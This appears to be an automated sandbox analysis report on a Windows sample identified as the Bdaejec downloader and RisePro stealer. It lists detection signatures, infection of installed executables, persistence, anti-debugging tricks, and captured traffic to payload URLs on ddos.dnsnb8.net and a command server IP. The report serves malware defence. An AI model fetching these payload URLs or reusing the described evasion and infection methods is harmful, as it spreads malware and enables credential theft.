Windows Analysis Report
Lisect_AVT_24003_G1A_89.exe

Overview

General Information

Sample name: Lisect_AVT_24003_G1A_89.exe
Analysis ID: 1481168
MD5: ee50f2db274c7abdbae3713a14020c24
SHA1: 312af659d98d04b23c6ab5f5324604fd04a96777
SHA256: 60285015f8b5e32f20411d30b7c64d8748827409275f5a42053b307bc2ff17de
Tags: exe
Infos:

Detection

Bdaejec, RisePro Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Bdaejec
Yara detected RisePro Stealer
AI detected suspicious sample
Contains functionality to check for running processes (XOR)
Contains functionality to inject threads in other processes
Found stalling execution ending in API Sleep call
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
PE file has a writeable .text section
PE file has nameless sections
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: Lisect_AVT_24003_G1A_89.exe Avira: detected
Antivirus detection for URL or domain
Source: http://ddos.dnsnb8.net:799/cj//k3.rar URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rar URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rar URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net/ URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar URL Reputation: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarky.tth.txtp Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarZ Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net/= Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rar=x Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rar=x Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k4.rar(y Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k2.rarl Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k4.rarC: Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rarL Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rarO Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k5.rar Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rarR Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rartC: Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k5.rarsC: Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarExh Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k4.rar Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k1.rarm Avira URL Cloud: Label: phishing
Source: http://ddos.dnsnb8.net:799/cj//k5.rarHxg Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k3.rarpy_ Avira URL Cloud: Label: malware
Source: http://ddos.dnsnb8.net:799/cj//k2.rarfC: Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Avira: detection malicious, Label: TR/Dldr.Small.Z.haljq
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files\7-Zip\Uninstall.exe Avira: detection malicious, Label: W32/Jadtre.B
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Avira: detection malicious, Label: W32/Jadtre.B
Multi AV Scanner detection for domain / URL
Source: ddos.dnsnb8.net Virustotal: Detection: 12% Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k2.rarZ Virustotal: Detection: 12% Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k2.rar=x Virustotal: Detection: 11% Perma Link
Source: http://ddos.dnsnb8.net/= Virustotal: Detection: 14% Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k2.rarl Virustotal: Detection: 10% Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k4.rarC: Virustotal: Detection: 12% Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k5.rar Virustotal: Detection: 12% Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k3.rarO Virustotal: Detection: 15% Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k3.rarL Virustotal: Detection: 8% Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k3.rarR Virustotal: Detection: 16% Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k1.rartC: Virustotal: Detection: 12% Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k4.rar Virustotal: Detection: 12% Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k5.rarsC: Virustotal: Detection: 15% Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k1.rarm Virustotal: Detection: 15% Perma Link
Source: http://ddos.dnsnb8.net:799/cj//k2.rarfC: Virustotal: Detection: 9% Perma Link
Multi AV Scanner detection for dropped file
Source: C:\ProgramData\MPGPH131\MPGPH131.exe ReversingLabs: Detection: 94%
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Virustotal: Detection: 86% Perma Link
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe ReversingLabs: Detection: 94%
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Virustotal: Detection: 86% Perma Link
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe ReversingLabs: Detection: 92%
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Virustotal: Detection: 90% Perma Link
Multi AV Scanner detection for submitted file
Source: Lisect_AVT_24003_G1A_89.exe ReversingLabs: Detection: 94%
Source: Lisect_AVT_24003_G1A_89.exe Virustotal: Detection: 86% Perma Link
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Joe Sandbox ML: detected
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Joe Sandbox ML: detected
Source: C:\Program Files\7-Zip\Uninstall.exe Joe Sandbox ML: detected
Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: Lisect_AVT_24003_G1A_89.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: Lisect_AVT_24003_G1A_89.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr

Spreading
barindex
Infects executable files (exe, dll, sys, html)
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe System file written: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe System file written: C:\Program Files\7-Zip\Uninstall.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe System file written: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe Jump to behavior
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_0108B3B5 recv,FindFirstFileExW,GetLastError, 0_2_0108B3B5
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_01898D7B FindFirstFileA, 0_2_01898D7B
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_0108B41B GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 0_2_0108B41B
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Code function: 1_2_00E629E2 memset,wsprintfA,memset,lstrlen,lstrcpyn,strrchr,lstrcmpiA,lstrlen,memset,memset,FindFirstFileA,memset,FindNextFileA,lstrcmpiA,FindNextFileA,FindClose, 1_2_00E629E2
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 7_2_0064B3B5 recv,FindFirstFileExW,GetLastError, 7_2_0064B3B5
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 7_2_0064B41B GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 7_2_0064B41B
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 8_2_0064B3B5 recv,FindFirstFileExW,GetLastError, 8_2_0064B3B5
Source: C:\ProgramData\MPGPH131\MPGPH131.exe Code function: 8_2_0064B41B GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,___std_fs_open_handle@16,GetFileInformationByHandleEx,GetLastError,GetFileInformationByHandleEx,GetFileInformationByHandleEx, 8_2_0064B41B
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe Code function: 1_2_00E62B8C memset,GetLogicalDriveStringsA,CreateThread,GetDriveTypeA,CreateThread,lstrlen,WaitForMultipleObjects,CreateThread, 1_2_00E62B8C
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\jHYZko.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\ Jump to behavior

Networking
barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49704 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49706 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 799
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 799
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49704 -> 44.221.84.105:799
Source: global traffic TCP traffic: 192.168.2.5:49705 -> 193.233.132.62:50500
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 44.221.84.105 44.221.84.105
Source: Joe Sandbox View IP Address: 193.233.132.62 193.233.132.62
Source: Joe Sandbox View IP Address: 193.233.132.62 193.233.132.62
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown TCP traffic detected without corresponding DNS query: 193.233.132.62
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\Desktop\Lisect_AVT_24003_G1A_89.exe Code function: 0_2_00FCDB60 recv,WSAStartup,getaddrinfo,closesocket,socket,connect,closesocket,FreeAddrInfoW,WSACleanup,FreeAddrInfoW, 0_2_00FCDB60
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k1.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k2.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k3.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k4.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /cj//k5.rar HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: ddos.dnsnb8.net:799Connection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: ddos.dnsnb8.net
Source: jHYZko.exe, 00000001.00000002.2306836184.0000000000E63000.00000002.00000001.01000000.00000004.sdmp, jHYZko.exe, 00000001.00000003.2014334444.0000000001240000.00000004.00001000.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2362229934.0000000000AE0000.00000004.00001000.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000002.2542328869.00000000001E3000.00000002.00000001.01000000.00000004.sdmp String found in binary or memory: http://%s:%d/%s/%sZwQuerySystemInformationntdll.dllNtSystemDebugControlSeDebugPrivilege%s%.8x.bat:DE
Source: jHYZko.exe, 00000010.00000003.2369419269.0000000000C65000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000002.2542768504.0000000000C48000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2369186739.0000000000C5F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net/
Source: jHYZko.exe, 00000001.00000003.2022506492.00000000012C7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net/=
Source: jHYZko.exe, 00000010.00000003.2369326263.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000002.2542768504.0000000000C40000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar
Source: jHYZko.exe, 00000010.00000003.2369326263.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rar=x
Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2369326263.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarExh
Source: jHYZko.exe, 00000010.00000003.2369312075.0000000000C58000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarky.tth.txtp
Source: jHYZko.exe, 00000001.00000003.2022506492.00000000012D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rarm
Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000003.2369326263.0000000000CB3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k1.rartC:
Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar
Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rar=x
Source: jHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarZ
Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarfC:
Source: jHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k2.rarl
Source: jHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmp, jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rar
Source: jHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarL
Source: jHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarO
Source: jHYZko.exe, 00000001.00000002.2306997313.00000000012D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarR
Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k3.rarpy_
Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar
Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rar(y
Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k4.rarC:
Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rar
Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rarHxg
Source: jHYZko.exe, 00000010.00000002.2542768504.0000000000CAD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ddos.dnsnb8.net:799/cj//k5.rarsC:
Source: Lisect_AVT_24003_G1A_89.exe, RageMP131.exe.0.dr, MPGPH131.exe.0.dr String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: Lisect_AVT_24003_G1A_89.exe, RageMP131.exe.0.dr, MPGPH131.exe.0.dr String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: Lisect_AVT_24003_G1A_89.exe, RageMP131.exe.0.dr, MPGPH131.exe.0.dr String found in binary or memory: http://pki-ocsp.symauth.com0
Source: Amcache.hve.1.dr String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.1.dr String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.1.dr String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.1.dr String found in binary or memory: http://www.develop.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.1.dr String found in binary or memory: http://www.lua.org
Source: SciTE.exe.1.dr String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.1.dr String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.1.dr String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.1.dr String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.1.dr String found in binary or memory: http://www.spaceblue.comMathias
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457547906.00000000008C1000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: http://www.winimage.com/zLibDll
Source: Lisect_AVT_24003_G1A_89.exe, 00000000.00000002.4457766837.0000000000FB1000.00000040.00000001.01000000.00000003.sdmp, MPGPH131.exe, 00000007.00000002.4457719191.0000000000571000.00000040.00000001.01000000.00000008.sdmp, MPGPH131.exe, 00000008.00000002.4457520263.0000000000571000.00000040.00000001.01000000.00000008.sdmp, RageMP131.exe, 0000000F.00000002.4457547906.00000000008C1000.00000040.00000001.01000000.0000000A.sdmp String found in binary or memory: https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-addressWs2_32.dll
